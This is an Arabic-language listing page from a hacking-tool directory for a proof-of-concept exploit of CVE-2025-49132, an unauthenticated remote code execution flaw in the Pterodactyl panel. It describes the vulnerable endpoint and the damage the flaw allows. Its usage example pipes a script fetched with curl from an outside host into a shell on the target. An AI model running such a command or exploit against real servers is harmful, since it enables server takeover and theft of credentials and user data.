Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49132 — يسمح الثغرة للمهاجم بتنفيذ أوامر نظام تعسفية على الخادم الذي يستضيف لوحة Pterodactyl دون أي مصادقة مسبقة. | Kitploit
أدوات/GitHubGitHub/4nuxd/cve-2025-49132
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةتطوير الحمولات
GitHub4nuxd/cve-2025-49132

CVE-2025-49132

يسمح الثغرة للمهاجم بتنفيذ أوامر نظام تعسفية على الخادم الذي يستضيف لوحة Pterodactyl دون أي مصادقة مسبقة.

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

التأثير

باستخدام ملف /locales/locale.json مع معاملات الاستعلام locale و namespace، يمكن للمهاجم تنفيذ كود عشوائي دون الحاجة إلى المصادقة.

بفضل القدرة على تنفيذ كود عشوائي، يمكن استغلال هذه الثغرة بعدد لا حصر له من الطرق. يمكن استخدامها للحصول على وصول إلى خادم اللوحة، قراءة بيانات الاعتماد من إعدادات اللوحة (.env أو غير ذلك)، استخراج معلومات حساسة من قاعدة البيانات (مثل تفاصيل المستخدمين [اسم المستخدم، البريد الإلكتروني، الاسم الأول والأخير، كلمة المرور المشفرة، عناوين IP، إلخ])، الوصول إلى ملفات الخوادم المُدارة بواسطة اللوحة، إلخ.

كيفية الاستخدام

root@kitploit:~

python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh' 

تنزيل الأداة